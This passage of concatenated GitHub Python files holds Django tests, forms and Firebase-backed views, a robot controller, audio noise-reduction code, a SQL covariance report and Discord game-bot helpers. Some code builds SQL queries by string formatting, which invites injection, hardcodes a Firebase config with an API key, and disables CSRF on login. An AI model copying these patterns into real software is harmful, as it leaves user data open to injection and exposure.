tb_name=\"genetic_step_02\")\n\n\nif __name__ == \"__main__\":\n obj = GeneticStep02()\n obj.run()","repo_name":"CNUHGILAB/Gastric_Cancer","sub_path":"Pathology_OD/Genetic_Step_02 copy.py","file_name":"Genetic_Step_02 copy.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"35461253946","text":"from .base import FunctionalTest\n\nfrom unittest import skip\n#\n\nclass ItemValiddationaTets(FunctionalTest):\n\n def test_cannot_add_empty_lists_items(self):\n # 伊迪丝访问首页,不小心提交了一个空待办事项\n # 输入框中没输入内容,她就按下了回车键\n self.browser.get(self.server_url)\n self.get_item_input_box().send_keys('\\n')\n # 首页刷新了,显示一个错误消息\n # 提示待办事项不能为空\n '''\n self.wait_for(lambda: self.assertEqual(\n self.browser.find_element_by_css_selector('.has-error').text,\n \"You can't have an empty list item\"\n )) \n \n '''\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:valid'\n ))\n # 她输入一些文字,然后再次提交,这次没问题了\n self.get_item_input_box().send_keys('Buy milk\\n')\n self.check_for_row_in_list_table('1:Buy milk')\n # 她有点儿调皮,又提交了一个空待办事项\n self.get_item_input_box().send_keys('\\n')\n # 在清单页面她看到了一个类似的错误消息\n self.check_for_row_in_list_table('1:Buy milk')\n '''\n self.wait_for(lambda: self.assertEqual(\n self.browser.find_element_by_css_selector('.has-error').text,\n \"You can't have an empty list item\"\n )) \n \n '''\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:invalid'\n ))\n # 输入文字之后就没问题了\n self.get_item_input_box().send_keys('Buy tea\\n')\n self.check_for_row_in_list_table('1:Buy milk')\n self.check_for_row_in_list_table('2:Buy tea')\n self.fail('write me')\n @skip\n def test_cannot_add_duplicate_item(self):\n # 伊迪丝访问首页,新建一个清单\n self.browser.get(self.server_url)\n self.get_item_input_box().send_keys('Buy wellies\\n')\n self.check_for_row_in_list_table('1:Buy wellies')\n # 她不小心输入了一个重复的待办事项\n self.get_item_input_box().send_keys('Buy wellies\\n')\n # 她看到一条有帮助的错误消息\n self.check_for_row_in_list_table('1:Buy wellies')\n #error = self.browser.find_element_by_css_selector('.has-error')\n #self.assertEqual(error.text, \"You've already got this in your list\")\n self.wait_for(lambda: self.assertEqual(\n self.get_error_elemeent(),\n \"text You've already got this in your list\"\n ))\n\n def test_error_messages_are_cleared_on_input(self):\n #伊迪丝新建一个清单,但方法不当,所以出现了一个验证错误。\n self.browser.get(self.server_url)\n self.get_item_input_box().send_keys('Buy wellies\\n')\n self.get_item_input_box().send_keys('Buy wellies\\n')\n error = self.get_error_elemeent()\n self.assertTrue(error.is_displayed())\n\n #为了消除错误,她开始在输入框中输入内容\n self.get_item_input_box().send_keys('a')\n #看到错误消息消失了,她很高兴\n error = self.get_error_elemeent()\n self.assertFalse(error.is_displayed())\n\n\n def get_error_elemeent(self):\n return self.browser.find_element_by_css_selector('.has-error')","repo_name":"sundhhy/TDD_Superlist","sub_path":"functional_tests/test_list_item_validation.py","file_name":"test_list_item_validation.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"28693047084","text":"\"\"\"lab1_task2 controller.\"\"\"\n\n# FIGURE OUT WHATS WRONG WITH ANGLE AND WRITE READINGS TO FILE FOR PLOT AND DO ERROR MESSAGE\n\nfrom controller import Robot\nimport math\n\n# create the Robot instance.\nrobot = Robot()\n\n# get the time step of the current world.\ntimestep = int(robot.getBasicTimeStep())\n\n# X degrees (0 - 360) [Modify]\nX = 20\n# Y seconds [Modify]\nY = 1 \n\ndegreeDiff = 360 - X\n\n# getting the motors and setting position and velocity\nleftMotor = robot.getDevice('left wheel motor')\nrightMotor = robot.getDevice('right wheel motor')\nleftMotor.setPosition(float('inf'))\nrightMotor.setPosition(float('inf'))\nleftMotor.setVelocity(0)\nrightMotor.setVelocity(0)\n\n# getting the position sensors\nleftposition_sensor = robot.getDevice('left wheel sensor')\nrightposition_sensor = robot.getDevice('right wheel sensor')\nleftposition_sensor.enable(timestep)\nrightposition_sensor.enable(timestep)\n\nimu = robot.getDevice('inertial unit')\nimu.enable(timestep)\nrobot.step(timestep)\n\n# function to convert from degrees to radians\ndef degreesToRadians(deg):\n return (deg * math.pi / 180) \n \n# function to convert from radians to degrees\ndef radiansToDegrees(rad):\n return ((rad + math.pi) * 180) / math.pi\n \ndistBetweenWheels = 2.28 \ndmid = distBetweenWheels / 2\nwheelRad = 0.8\nwheelCircum = 2 * wheelRad * math.pi\n\nXrad = degreesToRadians(X)\n\ndistanceLeft = Xrad * -dmid\ndistanceRight = Xrad * dmid\n\nvelocityLeft = distanceLeft / Y\nvelocityRight = distanceRight / Y\n\nphiLeft = velocityLeft / wheelRad\nphiRight = velocityRight / wheelRad\n\nangularVelocity = Xrad / Y\n\nprint(phiLeft)\nprint(phiRight)\n\nif (phiRight > 6.28):\n print (\"Error: Velocity exceeds 6.28\")\n exit()\n\ntime_start = robot.getTime()\n\nfile = open(\"lab1_task2_measurements.txt\", \"w\")\nfile.write(\"Angle:\\tTime:\\n\")\n\nleftMotor.setVelocity(phiLeft)\nrightMotor.setVelocity(phiRight)\n\n# main loop\nwhile robot.step(timestep) != -1 and (robot.getTime() - time_start < Y):\n\n leftMotor.setVelocity(phiLeft)\n rightMotor.setVelocity(phiRight)\n\n print(\"time: \" + str(robot.getTime() - time_start))\n print(\"degrees: \" + str(radiansToDegrees(imu.getRollPitchYaw()[2])))\n file.write(str(radiansToDegrees(imu.getRollPitchYaw()[2])) + \"\\t\" + str(robot.getTime() - time_start)+ \"\\n\")\n\nleftMotor.setVelocity(0)\nrightMotor.setVelocity(0)\n","repo_name":"bilaljoud/MobileRobotsLabs","sub_path":"Lab1/lab1_task2.py","file_name":"lab1_task2.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"1243474701","text":"# -*- coding: utf-8 -*-\nfrom django import forms\nfrom django.forms import ModelForm\nfrom apps.userprofile.models import SiteUser\nfrom apps.compo.models import Team\n\ndummy = []\n\n\nclass RegisterTeamForm(ModelForm):\n # teamname = forms.CharField(label='Lagnavn', max_length=30)\n # username = forms.ModelMultipleChoiceField(dummy)\n # action_url = 'add_team'\n class Meta:\n model = Team\n exclude = ('teamleader',)\n\n def __init__(self, *args, **kwargs):\n self.request = kwargs.pop(\"request\")\n tour = kwargs.pop(\"tour\")\n super(RegisterTeamForm, self).__init__(*args, **kwargs)\n unwanted_users = [self.request.user]\n for user in SiteUser.objects.all():\n if user.is_teamleader.filter(participant__tournament=tour) or \\\n user.is_teammember.filter(participant__tournament=tour):\n unwanted_users.append(user)\n self.fields['members'].queryset = SiteUser.objects.exclude(id__in=[o.id for o in unwanted_users])\n\n\nclass ChallongeForm(forms.Form):\n initial = 0\n CHOICES = (\n (u'single elimination', u'single elimination'),\n (u'double elimination', u'double elimination'),\n (u'round robin', u'round robin'),\n (u'swiss', u'swiss'),\n )\n type = forms.ChoiceField(choices=CHOICES, label=\"Challonge-type\")\n\n","repo_name":"kradalby/lanweb","sub_path":"apps/compo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"70043980901","text":"import streamlit as st\nfrom mplsoccer import Pitch\n\nclass Pitch_class():\n def create_pitch(self, row_count=None, column_count=None):\n if row_count is None:\n st.set_option('deprecation.showPyplotGlobalUse', False)\n pitch = Pitch(pitch_type='statsbomb', line_color='#000009')\n fig, ax = pitch.draw(figsize=(16, 11),constrained_layout=True, tight_layout=False)\n return pitch, fig, ax\n \n else:\n st.set_option('deprecation.showPyplotGlobalUse', False)\n pitch = Pitch(pitch_type='statsbomb', line_color='#000009', line_zorder=row_count+column_count+2, linewidth=1)\n fig, axs = pitch.grid(nrows=row_count, ncols=column_count, figheight=3 * (row_count+column_count),\n axis=False, endnote_height=0, title_height=0)\n return pitch, fig, axs\n \ndef add_locations(df):\n x = []; y = []\n for i, row in df.iterrows():\n x.append(row['location'][0])\n y.append(row['location'][1])\n df['x'] = x\n df['y'] = y\n return df\n\n#changes array elements by their cumuluative sum\ndef nums_cumulative_sum(nums_list):\n return [sum(nums_list[ :i+1]) for i in range(len(nums_list))]","repo_name":"berkanyuce/FIFA-World-Cup-2018-Visualization-and-Prediction","sub_path":"codes/utilites/utility_functions.py","file_name":"utility_functions.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"7152414899","text":"int1 = int(input())\r\nint2 = int(input())\r\nint3 = int(input())\r\n\r\nif int1 > int2 and int1 > int3:\r\n print(int1)\r\nelif int2 > int1 and int2 > int3:\r\n print(int2)\r\nelif int3 > int2 and int3 > int1:\r\n print(int3)\r\n","repo_name":"danielfilev/SoftUni","sub_path":"Fundamentals/Basic Syntax, Conditional Statements and Loops/Lab/02.largest_of_three_numbers.py","file_name":"02.largest_of_three_numbers.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"37973374926","text":"from django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nimport functools\nimport json\nimport os\nimport pyrebase\n \nfrom ppw.data.relational_queries import (\n accession_trend_by_time_query, active_inactive_investidors_query,\n age_distribution_query, carreer_investidor_activity_year_query,\n city_with_most_investidors_query, civil_status_investidors_activity_query,\n investidors_genre_query, most_common_job_query,\n state_with_most_investidors_query, top_3_most_common_jobs_query)\n \nconfig = {\n \"apiKey\": \"AIzaSyBWocM1wzV1lZh64h-IF1Owo-A3u8zrYlk\",\n \"authDomain\": \"projeto-ppw.firebaseapp.com\",\n \"databaseURL\": \"https://projeto-ppw-default-rtdb.firebaseio.com\",\n \"projectId\": \"projeto-ppw\",\n \"storageBucket\": \"projeto-ppw.appspot.com\",\n \"messagingSenderId\": \"1021347829402\",\n \"appId\": \"1:1021347829402:web:84b85d7e00f6956dbd3123\"\n}\n \n# Initialising database,auth and firebase for further use\nfirebase=pyrebase.initialize_app(config)\nauthe = firebase.auth()\ndatabase=firebase.database()\nPREFIX = 'Bearer '\n\ndef get_token(header):\n if not header.startswith(PREFIX):\n raise ValueError('Invalid token')\n return header[len(PREFIX):]\n\ndef check_user_auth(view_func):\n @functools.wraps(view_func)\n @csrf_exempt\n def wrapper(request, *args, **kwargs):\n if 'token' not in request.session:\n return _build_response({\"result\": \"error - user must be logged\"})\n return view_func(request)\n return wrapper\n \n@csrf_exempt\ndef signup(request):\n data = json.loads(request.body)\n email = data['email']\n passs = data['pass']\n try:\n user = authe.create_user_with_email_and_password(email, passs)\n request.session['token'] = user['localId']\n except Exception as ex:\n print (ex)\n return _build_response({\"result\": \"error to sign up\"})\n return _build_response({\"result\": \"success\"})\n\n@csrf_exempt\ndef login(request):\n data = json.loads(request.body)\n email = data['email']\n pasw = data['pass']\n try:\n user = authe.sign_in_with_email_and_password(email,pasw)\n except Exception as ex:\n print (ex)\n return _build_response({\"error\": \"invalid credentials\"})\n session_id = user['idToken']\n request.session['token'] = str(session_id)\n return _build_response({\"token\": session_id})\n\n@check_user_auth\ndef age_distribution_view(request):\n age_min = request.GET.get('age_min', 18)\n age_max = request.GET.get('age_max', 100)\n age_distribution = list(age_distribution_query(age_min, age_max))\n return _build_response(age_distribution)\n \n@check_user_auth\ndef top_3_most_common_jobs_view(request):\n top_job = list(top_3_most_common_jobs_query())\n return _build_response(top_job)\n \n@check_user_auth\ndef active_inactive_investidors_view(request):\n active_inactive_data = list(active_inactive_investidors_query())\n return _build_response(active_inactive_data)\n \n@check_user_auth\ndef state_most_investidors_lives_view(request):\n state_most_investidors = list(state_with_most_investidors_query())\n return _build_response(state_most_investidors)\n \n@check_user_auth\ndef city_most_investidors_lives_view(request):\n state = request.GET.get('state')\n city_most_investidors = list(city_with_most_investidors_query(state))\n return _build_response(city_most_investidors)\n \n@check_user_auth\ndef investidors_genre_view(request):\n age = request.GET.get('age')\n investidors_genre = list(investidors_genre_query(age))\n return _build_response(investidors_genre)\n \n@check_user_auth\ndef accession_trend_view(request):\n accession_trend = list(accession_trend_by_time_query())\n print (accession_trend)\n return _build_response(accession_trend)\n \n@check_user_auth\ndef most_common_carrer_view(request):\n most_common_job = list(most_common_job_query())\n return _build_response(most_common_job)\n \n@check_user_auth\ndef investidor_carreer_year_view(request):\n activity_investidor_carreer = list(carreer_investidor_activity_year_query())\n return _build_response(activity_investidor_carreer)\n \n@check_user_auth\ndef civil_status_investidors_activity_view(request):\n civil_status_investidors = list(civil_status_investidors_activity_query())\n return _build_response(civil_status_investidors)\n \ndef _build_response(result):\n return JsonResponse({'result': result})\n ","repo_name":"manoelvlm/projeto-ppw","sub_path":"api/ppw/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"29508727799","text":"import librosa\nfrom pysndfx import AudioEffectsChain\nimport numpy as np\nimport math\nimport scipy\n\n\ndef read_file(file_name):\n sample_file = file_name\n sample_path = sample_file\n\n y, sr = librosa.load(sample_path, None)\n\n return y, sr\n\n\ndef reduce_noise_power(y, sr):\n \"\"\"\n :param y: audio matrix\n :param sr:\n :return: audio matrix after gain reduction on noise\n \"\"\"\n cent = librosa.feature.spectral_centroid(y=y, sr=sr)\n\n threshold_h = round(np.median(cent)) * 1.5\n threshold_l = round(np.median(cent)) * 0.1\n\n less_noise = AudioEffectsChain()\\\n .lowshelf(gain=-30.0, frequency=threshold_l, slope=0.8)\\\n .highshelf(gain=-12.0, frequency=threshold_h, slope=0.5)\n y_clean = less_noise(y)\n\n return y_clean\n\n\ndef reduce_noise_centroid_s(y, sr):\n \"\"\"\n :param y: audio matrix\n :param sr:\n :return: audio matrix after gain reduction on noise\n \"\"\"\n cent = librosa.feature.spectral_centroid(y=y, sr=sr)\n\n threshold_h = np.max(cent)\n threshold_l = np.min(cent)\n\n less_noise = AudioEffectsChain()\\\n .lowshelf(gain=-12.0, frequency=threshold_l, slope=0.5)\\\n .highshelf(gain=-12.0, frequency=threshold_h, slope=0.5)\\\n .limiter(gain=6.0)\n\n y_cleaned = less_noise(y)\n\n return y_cleaned\n\n\ndef reduce_noise_centroid_mb(y, sr):\n \"\"\"\n :param y: audio matrix\n :param sr:\n :return: audio matrix after gain reduction on noise\n \"\"\"\n cent = librosa.feature.spectral_centroid(y=y, sr=sr)\n\n threshold_h = np.max(cent)\n threshold_l = np.min(cent)\n\n less_noise = AudioEffectsChain()\\\n .lowshelf(gain=-30.0, frequency=threshold_l, slope=0.5)\\\n .highshelf(gain=-30.0, frequency=threshold_h, slope=0.5)\\\n .limiter(gain=10.0)\n y_cleaned = less_noise(y)\n\n cent_cleaned = librosa.feature.spectral_centroid(y=y_cleaned, sr=sr)\n columns, rows = cent_cleaned.shape\n boost_h = math.floor(rows / 3 * 2)\n\n boost_bass = AudioEffectsChain().lowshelf(gain=16.0, frequency=boost_h, slope=0.5)\n y_clean_boosted = boost_bass(y_cleaned)\n\n return y_clean_boosted\n\n\ndef reduce_noise_median(y):\n \"\"\"\n :param y: audio matrix\n :return: audio matrix after gain reduction on noise\n \"\"\"\n y = scipy.signal.medfilt(y, 3)\n return y\n\n\ndef trim_silence(y):\n \"\"\"\n :param y:\n :return: audio matrix with less silence and the amount of time that was trimmed\n \"\"\"\n y_trimmed, index = librosa.effects.trim(y, top_db=20, frame_length=2, hop_length=10)\n trimmed_length = librosa.get_duration(y) - librosa.get_duration(y_trimmed)\n\n return y_trimmed, trimmed_length\n\n\ndef enhance(y):\n \"\"\"\n :param y: audio matrix\n :return: audio matrix after audio manipulation\n \"\"\"\n apply_audio_effects = AudioEffectsChain()\\\n .lowshelf(gain=10.0, frequency=260, slope=0.1)\\\n .reverb(reverberance=25, hf_damping=5, room_scale=5, stereo_depth=50, pre_delay=20, wet_gain=0, wet_only=False)\n y_enhanced = apply_audio_effects(y)\n\n return y_enhanced\n\n\ndef output_file(destination, file_name, y, sr, ext=\"\"):\n \"\"\"\n generates a wav file\n :param destination:\n :param file_name:\n :param y:\n :param sr:\n :param ext:\n :return: None\n \"\"\"\n destination = destination + file_name.split(\"/\")[-1][:-4] + ext + '.wav'\n librosa.output.write_wav(destination, y, sr)\n","repo_name":"YunhoJung/tobigs-rhapsody-speech-synthesis","sub_path":"augmentation/reduct_noise.py","file_name":"reduct_noise.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"71907688100","text":"import logging\nimport os\n\nimport pandas as pd\nfrom decide import data_folder\nfrom decide.data.database import connection, Manager\n\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\n\n\ndef write_result(conn, iterations, model_run_id, output_directory):\n\n df = pd.read_sql(\"\"\"\n SELECT \n a.p as p,\n a.issue as issue, \n a.repetion || '-' || a.iteration as pointer, \n a.numerator / a.denominator AS nbs\n FROM (SELECT\n sum(ai.position * ai.power * ai.salience) AS numerator,\n sum(ai.salience * ai.power) AS denominator,\n r.pointer AS repetion,\n i2.pointer AS iteration,\n m.p,\n i.name as issue\n FROM actorissue ai\n LEFT JOIN issue i ON ai.issue_id = i.id\n LEFT JOIN actor a ON ai.actor_id = a.id\n LEFT JOIN iteration i2 ON ai.iteration_id = i2.id\n LEFT JOIN repetition r ON i2.repetition_id = r.id\n LEFT JOIN modelrun m ON r.model_run_id = m.id \n WHERE ai.type = 'after' AND i2.pointer = ? AND m.id = ? \n GROUP BY m.id,r.id, i2.id, i.id) a\n \"\"\",\n conn,\n params=(iterations, model_run_id, ),\n index_col=['p'],\n columns=['issue']\n )\n\n for p in sorted(set(df.index)):\n x = df.loc[p].pivot(index='pointer', columns='issue', values='nbs').cov().round(5)\n\n x.to_csv(os.path.join(output_directory, 'covariance.equal-{}.csv'.format(p)))\n\n logging.info('writen covariance table for p={}'.format(p))\n\n\nif __name__ == '__main__':\n m = Manager(os.environ.get('DATABASE_URL'))\n m.init_database()\n\n model_run_id = 1\n\n write_result(connection, model_run_id, data_folder)\n","repo_name":"foarsitter/decide-exchange-model","sub_path":"decide/results/covariance.py","file_name":"covariance.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"24715521621","text":"import grequests\nimport math\nimport discord\nfrom discord.ext import commands\nfrom discord.ext.commands.cooldowns import BucketType\nimport aiosqlite\nimport asyncio\nimport random\nfrom discord import Webhook, AsyncWebhookAdapter\nimport aiohttp\nfrom PIL import Image\n\neffect_list = {\n \"shatter\" : \"Your mind has been shattered! Your messages are jumbled up!\",\n \"polymorph\" : \"You're a sheep! You can't speak human languages!\",\n \"drunk\" : \"You had a bit too much to drink...\",\n \"burning\" : \"You are on fire. Good luck.\",\n \"poisoned\" : \"Every time you make an attack, you lose an extra 2 AP!\",\n \"confidence\" : \"Hey, you're pretty good at this! Slightly raises your critical chance.\",\n \"inspired\" : \"You're amazing! Good job! Considerably raises your critical chance.\",\n \"defending\" : \"You are prepared for someone to strike! Anyone who attacks you fails, wasting their AP.\",\n \"wooyeah\" : \"**WOO YEAHIM ON A ROLL**\",\n \"shrouded\" : \"You're covered in some sort of shroud! It's harder for enemies to get a crit on you!\"\n}\n\nbase_classes = {\n 1 : 'Apprentice',\n 2 : 'Swordsman',\n 3 : 'Rogue',\n 4 : 'Archer',\n}\n\nprefix = ';'\n\nunobtainable_achs = 1\n\nwith open('adjectives.txt') as f:\n sheep_names = [line.rstrip() for line in f]\n\nbody_parts = ['bones', 'hair', 'fingernail', 'thumb', 'middle finger', 'big toe', 'knees', 'kneecap', 'bum', 'cheek', 'bumcheek', 'leg hair', 'skeleton', 'ligaments', 'muscles', 'tendons', 'teeth', 'mouth', 'tongue', 'larynx', 'esophagus', 'stomach', 'small intestine', 'large intestine', 'liver', 'gallbladder', 'mesentery', 'pancreas', 'anus', 'nasal cavity', 'pharynx', 'larynx', 'trachea', 'lungs', 'diaphragm', 'groin', 'kidneys', 'heart', 'spleen', 'thymus', 'brain', 'cerebellum', 'spine', 'eye', 'ear', 'arm', 'leg', 'chest', 'neck', 'toe', 'finger']\n\nmagnitudeDict={0:'', 1:'Thousand', 2:'Million', 3:'Billion', 4:'Trillion', 5:'Quadrillion', 6:'Quintillion', 7:'Sextillion', 8:'Septillion', 9:'Octillion', 10:'Nonillion', 11:'Decillion'}\n\ndef simplify(num):\n num=math.floor(num)\n magnitude=0\n while num>=1000.0:\n magnitude+=1\n num=num/1000.0\n return(f'{math.floor(num*100.0)/100.0} {magnitudeDict[magnitude]}')\n\nasync def add_effect(target, bot, effect_name, amount = 1):\n speaker = target.id\n if speaker not in bot.user_status:\n bot.user_status[speaker] = []\n user_effects = bot.user_status[speaker]\n exists = False\n for status in user_effects: # If the status exists, increment it.\n if status[0].lower() == effect_name.lower():\n exists = True\n status[1] += amount\n if not exists:\n bot.user_status[speaker].append([effect_name.lower(), amount])\n\nasync def find_origin(user_class):\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select class_name, preclass from classes;\") as chan:\n clss = await chan.fetchall()\n origin = user_class\n wcase = 0\n b_classes = [\"swordsman\", \"apprentice\", \"rogue\", \"archer\"]\n while origin not in b_classes:\n wcase +=1\n if wcase >= 10:\n break\n for item in clss:\n if item[0] == origin:\n origin = item[1]\n\n return(origin)\n\nasync def reply_check(message):\n if message.reference:\n return True\n else:\n return False\n\nasync def can_attack(user, target, ctx): # NOTE: Remember that you can't alter AP of those who have no profile in CC... Also, target may not always exist\n bot = ctx.bot\n if user not in bot.user_status:\n bot.user_status[user] = []\n user_effects = bot.user_status[user]\n for status in user_effects: \n if status[0].lower() == \"poisoned\":\n ### HANDLE STACKS\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[user].remove(status)\n else:\n status[1] -= 1\n ### APPLY EFFECT\n uid = str(user)\n balance = (bot.users_ap[uid] - 2)\n if balance >= 0:\n bot.users_ap[uid] = balance\n\n # UPDATE ATTACKING BASED QUESTS\n attack_based_quests = [7, 8, 9, 10, 11, 12, 13, 14]\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select currently_questing from users where id = '{ctx.author.id}';\") as chan:\n quest = await chan.fetchone()\n if quest:\n quest = quest[0]\n if quest in attack_based_quests:\n await update_quest(ctx.message, quest, 1, ctx.bot)\n # UPDATE ATTACKING BASED QUESTS\n\n # CHECK FOR DEFENDING AND MORE\n \"\"\"\n Priority List\n 1. Sellsword\n 2. Status Effects\n \"\"\"\n\n protected = bot.get_cog('sellsword').hired\n\n if target in list(protected.values()):\n vals = list(protected.values())\n keys = list(protected.keys())\n protector = keys[vals.index(target)]\n try:\n ss_hooks = [\n \"Right as you're about to attack, you feel a stab in your back! It's usr1, usr2's sellsword! You fall over, dead!\",\n \"You attempt to kill usr2, but usr1 blocks your attack before swiftly slicing your neck! usr2 nods at usr1, and continues on their way.\",\n \"Your attempt to attack usr2 is thwarted by usr1, who fires a crossbow bolt into your neck right as you're about to land your attack!\",\n \"usr2 sees your attack coming, but doesn't seem worried. Perplexed, you attempt to attack anyway! As you do, you feel usr1's blade through your back! usr2 smiles at you as the world goes dark.\"\n ]\n usr1 = bot.get_user(protector)\n usr2 = bot.get_user(target)\n hook = random.choice(ss_hooks)\n hook = hook.replace(\"usr1\", f\"**{usr1.name}**\")\n hook = hook.replace(\"usr2\", f\"**{usr2.display_name}**\")\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select coolness from users where id = '{protector}';\") as current_amount:\n coolness = await current_amount.fetchone()\n await conn.execute(f\"update users set coolness = '{coolness[0]+100}' where id = '{protector}';\")\n await conn.commit()\n await ctx.send(\"**[BLOCKED] | **\" + hook)\n except:\n await ctx.send(\"Your attempt to attack fails as their sellsword protects them, stabbing you instead!\")\n return False\n\n if target not in bot.user_status:\n bot.user_status[target] = []\n user_effects = bot.user_status[target]\n for status in user_effects: \n if status[0].lower() == \"defending\":\n ### HANDLE STACKS\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[user].remove(status.lower())\n else:\n status[1] -= 1\n ### APPLY EFFECT\n await ctx.send(\"You attempt to attack, but you cannot penetrate their defenses! Your attack fails!\")\n return False\n # CHECK FOR DEFENDING AND MORE\n\n return True\n\nasync def crit_handler(bot, attacker, defender, boost = None): \n # Values needed for later ############################################################ #\n crit_thresh = 1 # The number needed to roll below to get a critical #\n crit_max = 20 # The maximum nuber that the critical will be rolled on #\n ########################################################################################\n # We will now check for the person being attacked's status effects, to see if they have#\n # some sort of protective status effect. #\n ########################################################################################\n \n speaker = defender\n force_crit = None\n if speaker in bot.user_status:\n user_effects = bot.user_status[speaker]\n for status in user_effects: # We go through each status affecting the user [NOT ALL APPLY TO ON-MESSAGE EVENTS. THEREFORE, WE NEED IF STATEMENTS]. These are applied in order\n if status[0].lower() == \"shrouded\":\n crit_max += 10\n force_crit = random.randint(1,crit_max) \n ### HANDLE STACKS\n if not(force_crit <= crit_thresh):\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[speaker].remove(status)\n else:\n status[1] -= 1\n ### Now we check for the rest of the stuff #\n if boost: #\n if boost > 0: #\n crit_thresh += boost #\n else: #\n crit_max += boost #\n ### #\n if force_crit != None:\n crit = force_crit\n else:\n crit = random.randint(1,crit_max) # The rolled critical chance #\n # End Values #\n ###################################################################################### #\n ###################################################################################### #\n # Getting user status effects to check for critical-altering ones ### \n # THESE ARE FOR POSITIVE EFFECTS #\n speaker = attacker\n if speaker in bot.user_status:\n user_effects = bot.user_status[speaker]\n for status in user_effects: # We go through each status affecting the user [NOT ALL APPLY TO ON-MESSAGE EVENTS. THEREFORE, WE NEED IF STATEMENTS]. These are applied in order\n if status[0].lower() == \"confidence\":\n crit_thresh += 4\n ### HANDLE STACKS\n if crit <= crit_thresh:\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[speaker].remove(status)\n else:\n status[1] -= 1\n elif status[0].lower() == \"inspired\":\n crit_thresh += 8\n ### HANDLE STACKS\n if crit <= crit_thresh:\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[speaker].remove(status)\n else:\n status[1] -= 1\n # End Status Effect Check ############################################\n ######################################################################\n if crit <= crit_thresh:\n ########################################################################################\n # This is for classes that have \"when someone gets a crit on you\" effects. #############\n if str(defender) in bot.users_classes:\n if bot.users_classes[str(defender)] == \"pacted\":\n if await get_demon(defender, bot) == \"minehart\":\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from users where id = '{defender}';\") as info:\n user = await info.fetchone()\n level = user[8] - 19\n\n amount = 2*level \n cog = bot.get_cog('pacted')\n cog.minehart[defender] = cog.minehart[defender] + amount\n\n ########################################################################################\n ########################################################################################\n return True\n else:\n return False\n\ndef max_xp(lvl):\n return 20 * (lvl ^ 35) + 250 * lvl + 25\n\ndef max_xp_skills(lvl):\n return 85 * (lvl ^ 70) + 350 * lvl + 50\n\nasync def give_faction_points(contributor = None, f_id = None, amount = 0):\n async with aiosqlite.connect('unique.db') as conn:\n async with conn.execute(f\"select faction_points from factions where faction_id = {f_id}\") as u_info:\n faction_points = await u_info.fetchone()\n\n faction_points = faction_points[0] + amount\n if faction_points < 0:\n faction_points = 0\n\n async with aiosqlite.connect('unique.db') as conn:\n await conn.execute(f\"update factions set faction_points = {faction_points} where faction_id = {f_id};\")\n await conn.commit()\n\nasync def alter_items(uid, ctx, bot, item, change = 1, cost = 0):\n item = item.lower()\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select gold from users where id = '{uid}'\") as u_info:\n user_info = await u_info.fetchone()\n\n gold = user_info[0]\n \n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select item_name, amount from inventory where uid = '{ctx.author.id}'\") as u_info:\n user_info = await u_info.fetchall()\n\n inv = user_info\n\n# [('void', 1), ('hot dog', 5)]\n\n items = [item[0] for item in inv] # Array of just the names of the items in the 2D array.\n end = \"\"\n\n if gold - cost < 0:\n await ctx.send(\"You cannot afford this item!\")\n else:\n if item in items:\n indx = items.index(item.lower())\n item_amount = int(inv[indx][1]) + change\n if item_amount >= 10:\n await award_ach(14, ctx.message, bot)\n\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update inventory set amount = {item_amount} where uid = {uid} and item_name = '{item.lower()}';\")\n await conn.commit()\n \n elif item not in items:\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"insert into inventory values({ctx.author.id}, '{item.lower()}', {change});\")\n await conn.commit()\n \n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set gold = {gold - cost} where id = '{uid}';\")\n await conn.commit()\n if cost > 0:\n await ctx.send(f\"✅ | Purchase complete! Your gold balance is now {gold-cost}.\")\n\nasync def alter_ap(message, ap, bot):\n if str(message.author.id) in bot.registered_users:\n uid = str(message.author.id)\n balance = (bot.users_ap[uid] - ap)\n if balance >= 0:\n bot.users_ap[uid] = balance\n return True\n else:\n await message.channel.send(\"You don't have enough AP to do that! Buy some refreshers from the shop, do some quests, or wait until rollover!\")\n return False\n\nasync def xp_handler(message, bot, boost = 0):\n testing = False\n if boost:\n num = 4\n xp_amount = boost\n \n else: \n num = random.randint(1,4)\n if message.author.id in bot.server_boosters or message.author.id == 